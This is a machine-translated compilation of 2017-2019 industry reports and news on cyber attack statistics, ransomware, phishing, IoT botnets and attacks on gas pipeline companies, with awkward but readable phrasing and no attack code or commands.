According to information of January 29, 2019, the coordinated global cyber attack can cause damage at the rate from $85 billion to $193 billion. Specialists of the market of insurance of Lloyd's of London and Aon financial company according to the results of the carried-out stress testing for risk assessment came to such conclusion.

The similar attack will lead to emergence of the insurance claims covering different aspects - from a stop of business operations and cyberracketing to costs for response to cyberincidents.

Within the scenario of global cyber attack experts predict the total amount of insurance payments ranging from $10 billion to $27 billion.

A number of world sectors, according to the forecast of experts can suffer from the kibertaki, the greatest losses will be suffered by the organizations in spheres of health care, retail, bank and industrial.

In the countries with well developed economy (the USA and the states of Europe) material losses will be the most essential[2].


Solar recorded the growth of number of cyber attacks in Russia for 89%

On April 24, 2019 the Rostelecom-Solar company, national provider of technologies and services of protection of data assets, monitoring and information security management, submitted the analytical report about cyber attacks to the Russian companies for 2018.

The average daily event stream information security processed SIEM- systems and used for rendering services Solar JSOC, made 72.2 billion. In total for 2018 specialists of Solar JSOC recorded over 765 thousand computer attacks. It is 89% more, than the previous year. The share of critical incidents grew to 19%, having reached, thus, the highest value since 2015. This trend says that tools of malefactors continue to be improved. Rates of its creation in 2018 also promptly accelerated – in 2 days after emergence of information on vulnerability of CVE-2018-159 the Cobalt grouping already sent exploiting her harmful SOFTWARE.

In the second half of 2018 the number of the attacks directed to receiving control over IT infrastructure grew by 20%. Malefactors aim to be fixed imperceptibly in infrastructure in details to investigate it and to get deeper access to the information and technology systems.

We observe that on start malefactors often use absolutely non-core tools: so, cases of mailing of bank trojans on public authorities and the power organizations are often fixed. Further the managed segments a bot network are resold to other groupings and development of the attack goes already using specialized tools.
Dryukov Vladimir, director of the center of monitoring and response to cyber attacks of Solar JSOC of Rostelecom-Solar company

The number of the attacks, the money allocated for theft grew by 37% concerning the first half of year. Development of information exchange within community still allows the credit and financial organizations to obtain timely information on a method of implementation of the attack and to interfere with actions of malefactors. However, having even obtained information on the appeared cyber attack type, not all companies undertake any measures of protection. For example, despite damage from the mass attacks in 2017-2018, for April, 2019 266,294 Russian servers are still subject to vulnerability of EternalBlue, 953 units of network equipment work with the open Cisco SMI protocol. These organizations still remain vulnerable to such, apparently, outdated attacks as WannaCry or attacks on Cisco equipment.

2018 was also marked by a number of large viral infections of the technology networks isolated from the Internet (a segment of an APCS). As in such networks the antivirus is updated manually, accidental infection of one node leads to fast spread of a virus, and threat liquidation process, on the contrary, lasts several times longer, than in a corporate segment.

According to Solar JSOC, about 70% of the difficult purposeful attacks begin with a phishing. On average every 7th user who did not complete courses of increase in awareness gives in on social engineering. However this indicator can vary depending on functional division of the company. In legal service on average every fourth employee, in accounting, financial and economic service and logistics – every fifth, in the secretariat and technical support – every sixth falls a victim of a phishing.

Other threat of information security of the organizations proceeding from employees are leakages of confidential data. In 2018 nearly a half of all internal incidents of cybersecurity fell on them. Approximately in every fifth case of action of employees led to a compromise of accounts from internal corporate IT systems. Non-management employees (about 60% of cases) were responsible for internal incidents usually. The share of contractors and outsourcers usually fluctuated near a mark of 10%, however in the second half of the year it up to 15.2%. Possibly, it is connected with the fact that distribution of service model contributes to outsourcing market development whereas the level of information security in the Russian companies remains rather low.

Cybercriminals resort to more and more sophisticated methods of the attacks, including via IoT-devices

The Fortinet company, the world developer of the complete integrated and automated solutions for cyber security, published on March 7, 2019 results of the research of global threats of cyber security of Global Threat Landscape Report for the fourth quarter 2018.

To modern era convergence of a digital field and physical spaces is characteristic. And though, in terms of our digital economy this convergence promises the inconceivable benefits and advantages, unfortunately, it bears with itself very real risks in terms of cyber security. Cybercriminals attentively monitor the situation and develop modern tools for use of vulnerabilities, aiming at this forming digital convergence. Fundamental aspects of cyber security, including the idea of transparency, automation and agile of segmentation find special value and are the major factor for prosperity in our digital future. Only thus we will be able to protect ourselves from harmful activity of malefactors.
Phil Quade, the Chief information security officer in Fortinet

According to the published data, cybercriminals resort to more and more sophisticated methods of the attacks, performing them, for example, via devices of Internet of Things which in most cases are not protected in any way, or adapting malware based on open source codes to turn them into threats. Among the main outputs there are researches:

Index of threats Fortinet Threat Landscape Index

Record values of the index of vulnerabilities

According to the index of threats Fortinet Threat Landscape Index, cybercriminals continued to work tirelessly even on holidays. After the dramatic beginning growth of the Exploit Index index in the second half of quarter stopped. In spite of the fact that the general activity of cyber-malefactors decreased a little, the amount of vulnerabilities on the company (exploits per firm) increased by 10%, and the number of the recorded special vulnerabilities grew by 5%. At the same time, more difficult are botnets, and now it is more difficult to detect them. Time of infection with a botnet grew by 15%, approximately up to 12 days on firm. As for distribution of the attacks cybercriminals use automation equipment and algorithms of machine learning, departments of security need to use the same tools for counteraction to so modern and sophisticated methods of the attacks.

Cyber attacks 4 quarters 2018 in digits

Tracking of the systems of tracking

Convergence of physical things and aspects of cyber security leads to expansion of a surface of the attack, i.e. leads to increase in number of the attacked objects. Six of twelve most widespread vulnerabilities were related to Internet of Things, and four of six most widespread vulnerabilities were directed to observation IP cameras. Access to these devices allows cybercriminals to monitor private life, to plan unlawful activity on a physical entity, or to get access to network systems for start of DDoS of the attacks or the attacks for the purpose of redemption racketing. It is important to understand that the attacks can be performed even by means of devices which we use for control and security.

Tools open for all

Harmful tools open source are very useful to community of professionals in information security field: with their help specialists can test protection, researchers can study different threats, and leaders of seminars – to use real examples from practice. Source codes of similar tools are published on the numerous websites, for example, on GitHub. As these codes are available for all comers, also malefactors for the illegal acts can use them. In particular, they can adapt and upgrade these harmful tools for implementation of threats, substantially for creation of so-called ransomware, i.e. malware for the purpose of redemption racketing. As an example of where the similar malicious code was used for implementation of the attacks, it is possible to call the botnet Mirai IoT. From the moment of its emergence in 2016 the quantity of different options of this botnet continues to grow steadily. For cybercriminals of an innovation open improbable opportunities.

Blossoming of a steganography

Achievements in the field of a steganography allow to inhale life in old types of the attacks. The steganography usually is not used in the most often found attacks, however last quarter the top list of the most active botnets headed Vawtrak. It demonstrates that malefactors look narrowly at this type of the attacks more and more fixedly. Besides, within a quarter researchers detected the samples of malware using a steganography to hide directly malicious code in memes which extend on social networks. During the attack after attempt to contact the command server, the code looks for images in the corresponding tape on Twitter, loads them and then looks for in them the hidden commands for further distribution. This hidden approach shows that malefactors continue to experiment with different options of development of the malicious code.

Distribution through advertizing software

Free software products with the advertizing placed in them still not just annoy, and pose in themselves threat. At the global level advertizing software is the most widespread method of infection with malware for the majority of regions – more than a quarter of all infections in North America and Oceania, and nearly a quarter – in Europe falls to its share. As advertizing by software it is very extended in shops of mobile applications, this type of the attacks poses a serious threat especially for nothing the suspecting users of mobile devices.

Observation of operational technologies

Due to the continuing convergence of the information technologies (IT) and operational technologies (OT), in the considered period relative changes of distribution and frequency of the attacks on these environments were mentioned. Unfortunately, both the level of distribution, and frequency of the attacks in most cases increased. In particular, return of harmful Shamoon in a wave mode of the attacks in December indicates that these destructive attacks can repeat with a bigger force. The cyber attack aimed at OT - a system, or even just on the devices connected to network, for example, on valves, sensors or switches, can lead to destructive physical effects, including for crucial infrastructure and services, the environment or even to threaten lives of people.

The data on threats provided in a research for the last quarter once again confirm many of those trends which were predicted by global research firm FortiGuard Labs.

To anticipate actions of malefactors, the organizations need to transform the strategy of security within the general work on digital transformation. The platform of security which would cover all networked environment, from devices of Internet of Things to cloud infrastructures and which would integrate all elements of security for minimization of modern threats and for protection of the extending surface of the attacks is necessary for them. This approach will allow the organizations quickly and to communicate up to standard about threats, reduces necessary windows of detection (Windows of detection), and provides the automated tool for neutralization of modern threats.

Growth of number of the attacks using the harmful web addresses for 269%

On February 26, 2019 it became known that the Trend Micro Incorporated company provided the annual overview of cyber attacks which the companies faced worldwide in 2018. The landscape of cyberthreats of 2018 represented a mix from the old threats (a phishing, viruses racketeers) which renewed activity and did not so long ago appear (the hidden mining, attacks on vulnerabilities of IoT-devices, hardware vulnerabilities of processors).

Everyone two-three of years the landscape of threats considerably changes therefore even the most modern approaches to protection promptly lose the efficiency. It is necessary for the modern enterprises as it is possible to approach more flexibly questions of security and to regularly review the decisions made earlier. Our report on threats for 2018 is the tool for formation of the correct vectors of development of cybersecurity at the modern enterprise.
Mikhail Kondrashin, the technical director of Trend Micro in Russia and the CIS

2018 began with detection of hardware vulnerabilities of processors — Meltdown and Spectre. The patches which quickly left in January of the 2018th could not correct vulnerability and in some cases caused complaints of users to "blue screens of death". By the end of 2018 it was not succeeded to eliminate completely vulnerabilities.

Also 2018 was remembered by entry into force of the European General regulations in confidential data protection (GDPR). Regulators already fined the first violators: a video surveillance system in Austria — for 5,280 euros for violations in storage and processings of data; social network in Germany — for 9.2 million euros for storage of passwords in not encrypted form; hospital in Portugal — for 400 thousand euros for the severe violations connected with medical data.

The phishing became the main cyberthreat of year. In comparison with 2017 the number of the attacks using the harmful web addresses, access to which managed to be blocked, increased by 269%. Besides, the number of the blocked attempts of users with the unique IP address to pass to a phishing site increased by 82%.

In total in 2018 the harmful URL addresses in Russia were blocked by the solutions Trend Micro 6,876,981 times, in Ukraine — 1,442,481 time, in Kazakhstan — 71,147 times. Besides, in Russia 2,922,144 cases with the infected software while in Ukraine — 1,353,474, in Kazakhstan — 75,002 cases were recorded.

Malefactors continue to compromise business correspondence (BEC). Using a method of social engineering, creating familiar visual execution and a context of the letter, hackers manage to bypass a security system and to deceive the user. So, for 2018 growth of similar so by 28% was recorded.

Besfaylovy malware – one more tool of malefactors which activity was recorded in 2018. This method increases chance to remain imperceptible at the attack and to respectively achieve the goal. For the end of 2018 over 140 thousand attacks were recorded.

Office programs which are applied in the companies became the purpose of malefactors also. Among the vulnerabilities disclosed in 2018, 60% of cases were classified as "average level" of threats that is 3% more, than in 2017. And the number of vulnerabilities with the critical level of danger decreased from 25% (2017) to 18% (2018).

For example, in a case with Foxit, the solution for work with the PDF files, recorded the greatest number of vulnerabilities — 257, follow the results detected in programs for work with PDF from Adobe — 239, Microsoft — 124, Apple — 66 and Google — 4.

The wave of viruses racketeers declined. Sharp decline of their activity by 91% is mentioned by analysts of Trend Micro. However "racketeer" of WannaCry saved the positions and remained one of the main threats: in 2018 more than 600 thousand cyber attacks were revealed.

In 2018 reached the next pica the hidden mining — more than 1 million cases were recorded that shows growth in a year for 237%. A variety of the attacks within a year increased: advertizing platforms, pop-up declarations, harmful expansions of the browser, etc.

Trend Micro: About 48 billion cyber attacks are blocked

On February 13, 2019 it became known that the Trend Micro Incorporated company submitted statistics on cyberthreats in the world for 2018 by the most popular types of the attacks and the "attacked" countries. For 2018 more than 2.5 trillion requests were processed by solutions of the company. About 48 billion attacks, including threats by e-mail, harmful files and the URL addresses were as a result blocked and also 222 "families" of programs racketeers were identified.

The phishing still remains the most popular and numerous cyberthreat. In total in a year it was prevented by 41 billion cases, at the same time during the period from November to December their quantity was reduced by 200 million. The highest level of cyber attacks appeared in the USA - over 10 billion attacks were stopped there, in China and Brazil the number of the stopped attempts exceeded 2 billion, in India - 1.5 billion.

The.XLS format became the most widespread harmful investment, all 22 million spam attacks were recorded. And the number of the blocked URL addresses referring to the malware or the websites hostings exceeded 1 billion. Among the countries which residents most often faced harmful URL Japan (160 million blocked attacks), the USA (155 million) and Taiwan (73 million) is in the lead.

The number of cyber attacks through a compromise of business electronic correspondence (BEC) increased. For example, in 2017 about 10 thousand cases, and in 2018 already over 12 thousand are recorded. Generally employees opened letters in which payment on behalf of suppliers was requested. Or when the sender was represented by the lawyer or the lawyer of the company who is responsible for matters of confidence. However fraud with cracking of an account of TOP MANAGEMENT and mailing of letters or with "imitation" letters on behalf of the general and chief financial officer, for the purpose of money transfer on controlled by them accounts was the most popular. Most of all Australia (4.230 blocked threats) and the USA (3.694 blocked threats) suffered from the similar attacks.

At the end of 2018 it is worth selecting the five of the malware is a cryptocurrency CoinMiner miner (1,350,951 attacks), the racketeer of WannaCry (616.399 attacks), Powload (378.825 attacks), Downad (240.746 attacks) and Sality (166.981 attacks).

If to consider malware by so-called "scopes" that, for example, for banking sector the most dangerous are file infectors of Emotet – with its participation nearly 133.5 attempts of cracking were prevented, and Ramnit - is blocked 78.062 attacks. In the mobile sector for Android is SMSreg (1,638,167) and Shedun (1,345,900), for iOS - IOS_Jail Break Tool.A (397) and IOS_I Back Door.A (65). In case of PoS – the attacks, most often swindlers used such harmful tools as TinyPOS (1.264) and Recoload (286).

As in Russia, and around the world, we see accurately designated transition trend from use of programs racketeers to miners of cryptocurrency. If at your notebook or the smartphone the accumulator began to be discharged promptly, surely check it a modern antivirus.
Mikhail Kondrashin, the technical director of Trend Micro in Russia and the CIS

Positive Technologies: every second company in regions of the Russian Federation underwent successful cyber attack

Specialists of Positive Technologies published on December 26, 2018 survey results, carried out among 192 Russian companies from different regions. 87% of survey participants recognized that the measures of protection applied in their organizations are not enough, and 27% of the organizations note that the management does not allocate necessary funds for cyber security.

The research showed that every second of the polled companies respondents was exposed to successful cyber attacks. Among them — 43% of the enterprises of the sphere of power. Experts note that the true situation can be even worse as 30% of respondents from the sphere power engineering specialists were recognized that practice of identification of incidents in their companies is absent.

In spite of the fact that the division of cybersecurity is in most the companies which participated in poll, regular penetration tests carry out to corporate infrastructure only 30% of the companies which three quarters make financial institutions.

According to poll, 16% of the organizations addressed the help of third-party specialists for investigation of incidents, the budget on cybersecurity in most of them exceeds 10 million rubles. Only 6% of the companies respondents have own SOC (command center security).

The lack of end-to-end systems of protection of the company is tried to be compensated by implementation of antivirus software and firewalls — they are used practically in all polled organizations. According to poll, more than a third of respondents could not reflect the attack using a Higher Professional Education and prevent infection of the resources, despite use of the antivirus software. 57% of the companies consider the reason of success of cyber attacks absence or inefficiency of means of protecting.

According to a research, most often the organizations faced attempts of infection of workstations of employees and servers with the different malicious software (encoders, miners, etc.): the share of such companies made 60%. 57% of the polled companies faced a phishing.

More than a half of respondents the possible reason of success of cyber attacks called lack of information of personnel in questions of information security, a little less respondents noted inadvertent actions of employees. At the same time the most part of the companies does not see threat in insiders — the disloyal employees, for money disclosing confidential information on the company or helping with carrying out attacks on it.

Besides, poll showed that most the organizations disclosing information on the occurred incidents are limited to messages to the regulator and do not announce the attacks to the clients and partners.

According to the analysis, real financial loss from cyber attacks was suffered by 32% of survey participants. Every fourth company suffered from idle time of infrastructure, including 30% of the industrial companies.

At the same time most the companies respondents are sure that they will be able to eliminate cyber attack effects within a day — assessment which specialists are inclined to consider too optimistic: depending on a type of the attack idle time can continue up to 10 days and more, says Positive Technologies.

Results of a research show that the security of the regional organizations is in our country at a low level — the director of regional sales of Positive Technologies Dmitry Sivokon noted. — Most the companies respondents (82%) became a target for hackers in 2018. A third of respondents notes real financial loss from cyber attacks. Losses are especially sharply felt against the background of modest budgeting in most the polled organizations: investments into information security of every second company do not exceed 5 million rubles. With respect thereto many use only basic means of protecting. In the conditions of the limited budget we advise to select the most valuable assets and to provide their comprehensive protection.

Also Dmitry Sivokon noted that the person remains a weak link in data protection still. According to him, heads of business need to impart to the employees the culture of information security. And of course, qualified personnel which deficit in regions is felt many times stronger, than in Central Federal District are necessary. The shortage of specialists in data protection was noted by every fourth survey participant. If in the company there is no selected division of cybersecurity, it should be taken into account the possibility of delegation of a part of tasks to the third-party specialists having the corresponding licenses.

48% of the attacks were in the fourth quarter directed to data acquisition

In the IV quarter 2018 the number of notifications on personal data leakages continued to grow, the social engineering was used in every third attack, reported in Positive Technologies company on February 19, 2019. Besides, specialists of expert center of security Positive Technologies detected the hacker group aimed at the Russian banks.

According to the research, the number of notifications on personal data leakages continues to grow. Specialists explain it with enforcement of General Data Protection Regulation — the legal act setting rules of personal data protection of citizens of the EU. The companies which were held back incidents earlier after news of the first penalties and warnings will probably begin to notify more willingly clients on cyber attacks, analysts of Positive Technologies consider.

In the IV quarter of the last year 48% of the attacks were directed to data acquisition. It is interesting that during a half of them malefactors used the malware. First of all, (these are 28% of the attacks) criminals were interested in credentials (logins, passwords) for access to different services and systems, including to e-mail of staff of the companies.

The share of the purposeful attacks continued to grow: it made 62%. Experts note that malefactors even more often use "individual approach" for attacks to the organizations, and individuals suffer from large-scale infections with the malware. A third of the attacks on individuals was aimed at data acquisition. The greatest interest for malefactors provide credentials (in 60% of cases steal them), noted in Positive Technologies.

The share of the incidents which brought to criminals a sure pecuniary benefit grew by 6% in comparison with last quarter. In the IV quarter specialists of Expert center of security Positive Technologies noted activity of three groups attacking financial institutions — already familiar Silence and Cobalt and also the group aimed at the Russian banks. Malefactors sent harmful documents with macroes allegedly on behalf of FINTSERT and also through the compromised account of the employee of Alfa-Capital company. Despite similarity of both attacks with activity of the Treasure Hunters group, in a traffic analysis result experts drew conclusions on appearance of one more group of cybercriminals.

According to the experts Positive Technologies, social engineering in the IV quarter was used in every third attack.

The phishing to the staff of the company victim became already fulfilled scheme of malefactors within the purposeful attacks — the director of Expert center of security Positive Technologies Alexey Novikov noted. — So, in November our specialists detected a harmful investment in e-mails which allowed the malefactor to take the image from webcams, to write a sound, to do screen screenshots, to copy files from media devices. Criminals dexterously drew attention of addressees with a bright subject of the letter and the blurred image of the opening file on which looked through the coat of arms — so that the document had to cause trust and desire to get acquainted with it, having turned on a necessary script. While the victim saw the document stub on the screen, on the computer is imperceptible for the user the Higher Professional Education for remote control of Treasure Hunter which collected information on a system was established, sent it to a remote command server and accepted commands from it.

According to the head of the analytical department of cybersecurity of Positive Technologies Evgeny Gnedin, e-mails are often sent in the marketing purposes and contain buttons invitations for transition to the website.

We remind that before clicking such button in the letter it is necessary to pay attention addressed to the sender and also to the link where transition after clicking will be performed — Evgeny says.

Research Balabit

Check Point: 97% of the companies are not ready to cyber attacks of Fifth generation

According to the report of 2018 Security Report prepared by Check Point Software Technologies company, more than 300 mobile applications extending through official shops contain a malicious code. Also specialists of Check Point note that the number of cloud threats, the attacks of cryptominers, vulnerabilities of MacOS and IoT-devices continues to grow. Read more here.

Attack to the pipeline companies

At the beginning of April, 2018 it became known of hacker attacks to four American gas companies. As a result of cyberattack some IT systems for several days were stopped for the purpose of security.

Unknown cybercriminals attacked Boardwalk Pipeline Partners, Eastern Shore Natural Gas, Oneok and Energy Transfer which are engaged in service of gas pipelines. The attacks were made at the end of March.

In Oneok company which manages gas trunks in the Perm   oil and gas bearing basin in Texas and the Rocky Mountains (the western part of North America), said that as a precautionary measure the decision to disconnect a computer system after the contractor became "the obvious purpose for cyber attack" was made.

Four pipeline companies in the USA were attacked by hackers. IT systems are stopped
Four pipeline companies in the USA were attacked by hackers. IT systems are stopped

Did not specify Oneok what work of a system was frozen. Energy Transfer told that the company disconnected the platform for data exchange (EDI; transmit purchase orders, invoices, etc. through it) with clients which was developed by child Energy Services Group for acceleration of document transfer and cost reduction.

This situation did not influence our activity. During shutdown we manually execute all planned transactions — the press secretary of Energy Transfer of Vicki Granado told the Bloomberg agency.

The EDI solution Energy Services is also used by other companies, such as Tallgrass Energy Partners and Kinder Morgan. Their representatives say that computer systems of the companies did not suffer. Boardwalk Pipeline Partners confirmed that in an EDI system there was a failure, however did not specify the reason. The same was told in Eastern Shore Natural Gas.

By April 4, 2018 electronic document management systems of all gas companies which endured cyberattacks are completely recovered.

The president of the North American Energy Standards Board organization (is responsible for development of industry standards in the field of power) Rae McQuade says that inactivation of EDI systems does not stop gas transfer, however has a serious impact as the companies should look for bypass options for interaction.

The partner of Jones Walker Andy Lee notes that the companies managing mostly American pipeline network 3 million long it is lovelier, use third-party solutions for document flow therefore depend on those who are responsible for security of such systems. At the same time hackers are attracted by easily availability of EDI that allows them to extend viruses racketeers or to steal data with the subsequent sale.

According to the expert in cyber security of the industrial systems Phil Neray, a hacker attack to the pipeline companies was carried out for the purpose of financial enrichment, however you should not exclude that behind it there were authorities of any countries.

Networks of the companies which have some important assets, for example, pipelines, electricity, finance, can be the purposes for the attacks. So was always — the operating officer of cybersecurity supplier company of the solutions R9B John Harbaugh said.

The systems of Electronic Data Interchange are used by malefactors for penetration into IT infrastructure of the companies, but are not an ultimate goal for them, the representative of Accenture Jim Guinn argues.

There is no value in access to EDI, except as for movement on network at all to do something else more malicious. All bad artists look for a method to get into the museum to steal Van Gogh's picture — he reported, having added that there are no fundamental differences between systems for oil and gas companies.[3]


By 2021 the global damage from cyber attacks will exceed $6 trillion

As declared in RedSys company at the end of December, 2017, the number of cyber attacks continues to increase. Just in the first half of 2017 more than 900 cyber attacks as a result of which more than 1.9 billion data sets are stolen were made. At the heart of the majority of the attacks the malicious software of ransomware which infects computers and limits access to files in exchange for the redemption is recorded. Besides, some malwares directly stole millions of dollars.

In general cyber attacks of 2017 highlighted the existing problem of information security support, the director of Information Security Center of RedSys Dmitry Shumilin considers.

The trend which was observed during previous years unambiguously says that precisely you should not expect reduction of quantity and scales of the attacks. Possibly, the attacks will aim even more often at specific vulnerable points, increase in the attacks using devices of Internet of Things which prevalence as avalanche increases recently is also expected, and their security at the same time leaves much to be desired — the expert predicts.

Increase in number of threats, in turn, will lead to the sharp growth of expenses of business and government institutions on data protection. So, according to forecasts of Cybersecurity Ventures, within the next four years global expenses on cyber security will make about $1 trillion. However the damage from cyber crime too considerably will grow. So, in 2015 expenses on compensation of global damage because of the attacks by means of programs racketeers made $325 million. In 2017 these expenses, by estimation, will exceed a mark of $5 billion, and by 2021 the indicator will step over a level in $6 trillion.

Any enterprises around the world, regardless of their size and a kind of activity can undergo cyber attack. At the same time many corporations already thought of problem solutions — it is confirmed by the budgets planned for 2018, Dmitry Shumilin added.[4]

The computer which "cannot be cracked" is invented

Michigan State University received from the Agency of the advanced defense researches (DARPA) a grant in the amount of $3.6 million for development of the computer which will be impregnable for the hacker attacks at the hardware level[5].

The idea of the project under the name Morpheus - to make vain any attempts of the attacks on program or computer hardware. Hardware Morpheus component parts will be "not solved puzzle": all information which is contained in a system can be quickly and is randomly redistributed on different components.

Main article: DARPA Morpheus "Not Solved Puzzle"

PwC: Most the Russian companies cannot resist to cyber attacks

Most the Russian companies cannot successfully resist to cyber attacks, said in the research of the international consulting company PwC which is released in November, 2017.[6]. A half of the Russian respondents notes that in their companies there is no general strategy of information security, and in 48% of the companies there is no training program directed to increase in level of awareness of employees in security issues. Read more here.

$1.3 billion were lost by marketing specialists in 2016 because of a fraud with DeviceID reset

On September 20, 2017 the AppsFlyer company announced identification by solution Protect360 of scale of a fraud (fraud) with DeviceID reset. According to data retrieveds, over 50% of all fraud connected with installations of applications that it is much bigger are the share of this type of a fraud than it was supposed. By AppsFlyer estimates, in 2016 marketing specialists lost $1.1 – $1.3 billion because of a fraud with DeviceID reset.[7]

Recently detected type of fraud is based on reset of the identifier of the mobile device. It is applied by the criminals operating high-organized "farms" of mobile devices (also known as "mobile farms" or click farm), to concealment of the actions. Such farms can contain thousands of devices as result, is hard to hide fraud of such scale, in the investigation of what criminals resort to a number of acceptances to remain in the shadow. Consecutive reset of a unique identifier — one of acceptances which is carried out for each mobile device. Then phone entering "a mobile farm" is defined as new even after several thousand installations of the application that yields to the companies losses at the rate to several billion dollars annually, explained in AppsFlyer.

According to the data obtained using Protect360, fraud with DeviceID reset:

  • takes away money from marketing specialists in 10% of cases — on average one of 10 inorganic installations is fraudulent. It means that from each dollar spent for mobile advertizing, 10 cents go straight to pockets of swindlers;
  • equally mentions both iOS, and Android;
  • causes damage of 16 of 100 leading advertizing networks — over 20% of the provided installations of applications are fraudulent.

Source: AppsFlyer
Source: AppsFlyer

This type of a fraud is not limited to a certain country or the region. Swindlers generally do by the target the countries with high compensations of CPI (cost-per-install, "the price for installation"). Besides, the swindlers who are engaged in DeviceID resets aim at regions with a large number of campaigns and users to get lost in it is expected a big traffic flow and to remain unnoticed for advertisers and networks.

According to a research, Eastern Europe which includes Russia is the share of the region to 4.8% of the total amount of the financial losses caused by this type of fraud, worldwide. The company managed to be established that the biggest share of fraudulent installations with reset of DeviceID is the share of Asia, it is followed by North America and Europe. At the same time the greatest financial loss is tested by North America (33.6% of universal level), Western Europe (17.1%) and Southeast Asia (14.5%).

Eset recorded 15 million cyber attacks to users of torrents

The Eset company published on August 18 analysis results of the cyber attacks executed using P2P networks. Since the beginning of 2016 the system of telemetry Eset recorded 15 million incidents in which loading of a malicious code was connected with popular torrents-applications and file exchange services. Hackers use P2P networks for delivery of the malware by two methods: compromising the entrusted torrents-applications or masking harmful contents in "distributions".

In particular, in 2016 malefactors attacked users of macOS, having cracked the website Transmission torrent client. They processed the application, having turned on in its structure a malicious code.

In April, 2016 from the website Transmission the coder KeRanger was loaded under the guise of the legitimate application. Developers deleted the infected distribution kit in several hours, but thousands of users suffered from threat. Authors of KeRanger used the resistant encryption algorithm that minimized chances of data recovery.

In August, 2016 hackers repeated an attack on the website Transmission. This time together with a torrent client on the computer the malware Keydnap intended for theft of passwords from "iCloud bunch of keys" and remote access to a system was installed. The Transmission command deleted the troyanizirovanny application from the website within several minutes after the address of specialists of Eset.

However, according to Eset, not all incidents are connected with the software, there is also a risk of loading of harmful torrents. In April, 2017 experts of the company detected a trojan of Sathurbot which extended in such a way — it disappeared in torrents with piracy software or the movie, masking under the codec.

The computers infected with Sathurbot were a part of a botnet which at the time of the research contained 20 thousand devices. The botnet looked for in network the websites based on WordPress and cracked them by search of passwords. The compromised websites were used for further distribution of harmful torrents.

In February, 2017 malefactors distributed through torrent trackers the new coder disguised under Patcher — the application for cracking of Adobe Premiere Pro, Microsoft Office for Mac and other paid software. It is impossible to recover the ciphered files even in case of payment of the redemption — in pseudo-Patcher function of contact with the command server therefore operators of the coder have no decryption key is not provided.

Just in case I remind of responsibility for violation of copyright and use of pirated content — Alexey Oskin, the head of department of technical marketing of Eset Russia noted. — Nevertheless, P2P ecosystem — not only and not just piracy, at it is a number of legitimate ways of application. And, as any mass technology, file exchange services are interesting to cybercriminals. Basic recommendations: use only the licensed software, ignore the suspicious websites and torrents, protect the computer a complex anti-virus product.

Global cyber attack can cost to world economy $53 billion

As experts of Lloyd's of London and Cyence counted in July, powerful global cyber attack can cost to world economy $53 billion — about the same when damages from natural cataclysms, such as hurricane "Sandie" are assessed. In the report researchers described possible damage to economy from cracking of cloud provider and cyber attack to operating systems under control of which computers in the companies work worldwide, transfers Reuters news agency.[8]

Losses from global cyber attack are comparable to damage from natural cataclysms. Photo:
Losses from global cyber attack are comparable to damage from natural cataclysms. Photo:

According to an assumption of experts of Lloyd's of London and Cyence, malefactors can implement the malicious code programmed on removal from a system of computers in a year in software of cloud provider. After implementation the malware will extend among clients of provider, beginning from financial institutions and finishing hotels, yielding them huge losses from idle time and repair.

According to the estimates of researchers, the extent of damage from serious cyber attacks can fluctuate from $4 billion to $53 billion and reach $121 billion. The amount of a loss from cracking of operating systems varies from $9.7 billion to $28.7 billion. For comparison, the damage from the hurricane "Sandie" — the powerful tropical cyclone which claimed the lives of 185 people in 2012 — was $50 billion.

Positive Technologies: Russia took the second place on number of cyberincidents

Every tenth cyberincident takes place in Russia, the quantity of trojans racketeers will grow thanks to the "ransom as a service" direction, and the power of DDoS attacks will increase due to vulnerabilities in "smart things". Such observations and forecasts contain in a new research of relevant cyberthreats of Positive Technologies company according to the results of the first quarter 2017.

Experts of Positive Technologies note that for the first three months 2017 there were only five days during which data on new cyberincidents did not arrive.

The most attacked country in the first quarter is the USA (41% of all attacks), Russia took the second place by the number of cyberincidents (10%), and on the third place there was Great Britain (7%). In general, not less than 26 countries were exposed to the attacks worldwide.

The greatest number of the attacks was directed to the state organizations, every fifth attack (20%) fell on them. As premises the aggravated both external, and internal political situation of many countries for this purpose can serve. Social networks, search systems, online stores and other online services became a target of every ninth attack (11%). A little better the situation in the financial industry — was the share of banks to 9% of all incidents. Further education (8%), medical institutions and the service industry (on 7%), the industrial companies (5%) and the defense enterprises (3%) follow.

In a research experts considered the occurred incidents from two parties at once: what was attacked by malefactors and as they made it. So, the majority of the attacks were aimed at IT infrastructure of the companies (40% of the attacks). Mainly, malefactors were interested in sensitive information (for example, personal data, data of owners of payment cards) which can be sold in the black market. However experts note decrease in interest of cybercriminals in personal data and, respectively, decrease in their cost that can be connected with the market overstocking.

The second place on prevalence was taken by attacks on web applications (33%) which open a set of opportunities before malefactors: from obtaining confidential information before penetration into an intra-company network. The majority of the web attacks were implemented through vulnerable components (outdated libraries and CMS systems) though vulnerabilities of web applications were also operated. Specialists of Positive Technologies at the beginning of 2017 recorded a set of the attacks on the websites of the state organizations and different business companies.

Significantly also the number of the attacks on POS terminals (3% of all attacks) increased, having exceeded indicators of the first quarter 2016 almost six times and having made 63% of all similar attacks for 2016. Malefactors used means of remote administration and trojans.

If to tell about the most popular methods of the attacks, then on the first place still use of the malware. Experts of Positive Technologies note emergence of the "racketeers as service" model: creators of the malware even more often are not organizers of the attacks, and earn from sale of trojans to criminal groupings. Thus, developers of the malware, having got profit on sale, can prepare a new trojan while other criminals are engaged directly in attack implementation.

As for DDoS attacks, in the first quarter 2017 their power significantly increased in connection with connection to botnets of increasing number of IoT-devices. So, in March, 2017 the next malware (ELF_IMEIJ.A) directed to IP cameras, video surveillance systems and network writer devices of production AVTech was revealed. Besides, over 185 thousand vulnerable IP cameras which can also be a part of a new botnet were revealed.

Fortinet: The efficiency of tracking and management of distributed infrastructures decreases

In June, 2017 Fortinet published data of the report on the world research of threats. The chain of implementation of cyberthreats became an object of research. In the context of corporate technologies and current trends of development of the sphere three main directions of the attacks — exploits-application, the malicious software and botnets were considered. As shows a research, despite extended coverage of more resonant attacks, large-scale infrastructure "Kiberprestupleniye as service" became the conductor of the prevailing part of the successful attacks which the organizations happened to face. Three main outputs stated in [9] are included below [10]

1) Malefactors always consider past experience when developing instruments of the attacks ready to application at any time and in any place

Thanks to modern tools and infrastructure "Crime as service" malefactors can quickly act on universal level. It means that on the Internet there are no distances or geographical boundaries as the majority of threats functions on the scale of the whole world, but not certain regions. Criminals are always ready to the attack and constantly are engaged in search of vulnerabilities at the international level.

Knowledge of trends of development of exploits and also the principles of functioning and distribution of programs racketeers will allow to avoid harmful effects of the attacks which will succeed WannaCry. Harmful programs racketeers and their versions extended worldwide and at the same time strike hundreds of the organizations.

